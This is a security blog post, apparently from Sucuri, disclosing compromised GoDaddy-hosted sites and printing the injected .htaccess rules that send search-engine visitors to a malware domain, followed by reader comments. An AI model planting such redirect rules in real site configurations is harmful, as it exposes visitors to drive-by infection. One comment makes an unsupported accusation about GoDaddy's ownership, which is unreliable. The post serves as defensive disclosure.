GoDaddy shared servers compromised – .htaccess redirection to sokoloperkovuskeci.com

We are seeing many sites hosted on GoDaddy shared servers getting compromised today (and for the last few days) with a conditional redirection to sokoloperkovuskeci.com. This is what it looks like on our scanner:

Suspicious conditional redirect.
Details: http://sucuri.net/malware/entry/MW:HTA:7
Redirects users to:http://sokoloperkovuskeci.com/in.php?g=1105

This is caused by this entry that is added to the .htaccess file of the compromised sites:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]

What is going on?

These redirections attacks are very common on outdated WordPress and Joomla sites, but this time (and for this specific malicious domain), we are only seeing them on GoDaddy hosted sites. So it looks like a compromise on their own servers (similar to what has happened in the past).

What happens to anyone visiting these hacked sites?

The malware checks if anyone visiting the infected site is coming from a Google search (or Yahoo, or Bing) and if they are, redirects them to that domain (sokoloperkovuskeci.com). In there, the user gets redirected again to other locations to get their browsers infected too. So you have to fix your site asap to protect your own users.

Need help?

You can scan your site here: sitecheck.sucuri.net to see if it is compromised. If you need someone to clean it up for you, sign up here: Sucuri Signup

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • Madcarrots

    why do you have the share/tweet links if you keep resetting them when someone posts this article to facebook?

  • Canhazcode

    I see this happen quite often it just doesn’t make news.  All it takes is one lfr/rfi on a site and the server is owned.  Often times discovered lfi/rfi are on GoDaddy servers it seems.  They’re an easy target.

  • Admin

    You’ll need to request malware review at Google if this happened to you. Read this link:
    http://www.google.com/support/webmasters/bin/answer.py?answer=168328

  • http://twitter.com/youwave YouWave for Android

     I am one of the victims. I cleaned up my site and now it is under Google Webmaster Tool review. I called GoDaddy customer support. They basically have no idea what was going on except to say that I have fix MY site’s vulnerability. From what I see from your post, the vulnerability is likely from Godaddy itself. Do you have any insight on the method of this attack?

    I am considering moving out of Godaddy. Are other hosting providers safer?

    • mediazone

      We tested many hosting, but had problem with all of them. The only that never made us problem is the one we currently use and we will always use: stablehost.com
      You can use our referral if you want to help us. This way, we will get 10% of your payment (you will not pay more for the service). Link: http://bit.ly/n2tzKU 
      For more details about stability, ask us !

    • Allan

      One of my clients was using Go Daddy to host their web site, which became irreparably damaged (in July 2010) when attacked by a rootkit. Go Daddy admitted that the infection occurred in 2008, even before the web site was installed in a virtual dedicated server (in 2009). So it had been sitting on the server for over a year, undetected. Apparently Go Daddy doesn’t bother running security software to check for rootkits. I would never use them for hosting.

      For all my sites and my clients’ sites, I use Sightground.com, and so far they have had 100% uptime, with unlimited disk space and bandwidth. I’ve never had any security problems with accounts on their servers

    • Dusty

      Host with HostGator.com :)

  • Guest

    This isn’t news, these types of incidents are routine for GoDaddy shared hosting.

  • http://stewartmedia.biz/myblog/ jimboot

    Thanks for this post – we had one of our clients hit by it. No announcement from GoDaddy I see. 

  • Pingback: It’s shit like this GoDaddy « Meganet Central Industrial()

  • invalidka

    In the middle of June, while trying to fix the MX records of my website, I found a simple URL exploit which gave me access to every single email account stored on GoDaddy’s email servers (ironically named “secure-server.net”). After confirming that I wasn’t just crazy and was indeed able to hit other user’s accounts, I called GoDaddy right away. I was passed around on the phone, and they made it seem like they didn’t care. I was never followed up with, or thanked. They fixed the issue 2 days later.

    It sucks that such a big company can’t get their simple security shit together. Theoretically, I could have created a script that would have downloaded the inboxes of millions of their customers, which I’m sure would result in a significant monetary and reputation loss for the company. I’m sure that there are many more issues that we haven’t heard about, and I hope people really put some pressure on these guys to get their act together. I know I didn’t.

  • http://www.jpanganiban.com Jesse Panganiban

    If you’re a victim, get out of GoDaddy then get yourself a decent VPS: Linode or Slicehost. Manage your server from ground-up and know what’s going on. Be in control.

  • http://www.chriswiegman.com/ Chris Wiegman

    Another reason why GoDaddy should stop trying to offer hosting and concentrate on what they’re good at.

    • http://wkevingilbert.me/ Kevin Gilbert

      Which is what? They’re not good at anything.

  • Pingback: eXactBot Hosting Solutions » Hundreds of Go Daddy-hosted sites compromised()

  • Pingback: Hundreds of Go Daddy-hosted sites compromised | PC Digital Tech - Digital Tech News Magazine()

  • Pingback: Hundreds of Go Daddy-hosted sites compromised « ITS News Feeder()

  • Pingback: GoDaddy Hosted Websites Under Attack « computeraddicted()

  • Pingback: Drošības Eksperti()

  • M Syeda

    they never learn them self…we should teach them by leaving their hosting.

  • Pingback: Comprometen los servidores de hosting de GoDaddy - La Isla Buscada()

  • Pingback: ste williams » Go Daddy mass hack points surfers towards malware()

  • Pingback: Comprometen los servidores de hosting de GoDaddy | Blog DyTconsulting()

  • Pingback: GoDaddy admet avoir été victime d’une attaque touchant 445 sitesMontserrat Agence de Communication | Montserrat Agence de Communication()

  • Pingback: Is GoDaddy shared servers compromised? | Hosting Formula |Story, experience, trial and error in managing my blog and hosting things()

  • Pingback: Tech News » Go Daddy mass hack points surfers towards malware()

  • Guest

    I am suspecting that GoDaddy may be co-owned by the Russian guy Andreev (not his real family name) who owns Monopost servers and Badoo. He’s also a creator of SpyLog and seemingly a seasoned hacker. Badoo has many profiles that were created by shady means meaning by using emails and names of people whose sites, emails, or directory listings have been hacked. What is most worrysome is that the guy is a perfect scammer with his “business” and :residence” at odd places such as Cyprus, Russia, UK, and other. FBI should shut him down.

  • Pingback: Web Hosting » Blog Archive » Go Daddy Responds Over Compromised Hosting Accounts()

  • beatstockpromotersdotcom

    I recently had an .Htacess redirect on my site web site here about the top penny stocks and then after I fixed the same hacker put an iframe code injection and rehacked getting me banned from Google. I would like to know the cheapest way to prevent this in the future. SOm people asaid switch from Godaddy and then others said the host doesn’t really matter. Who to listen to???

Share This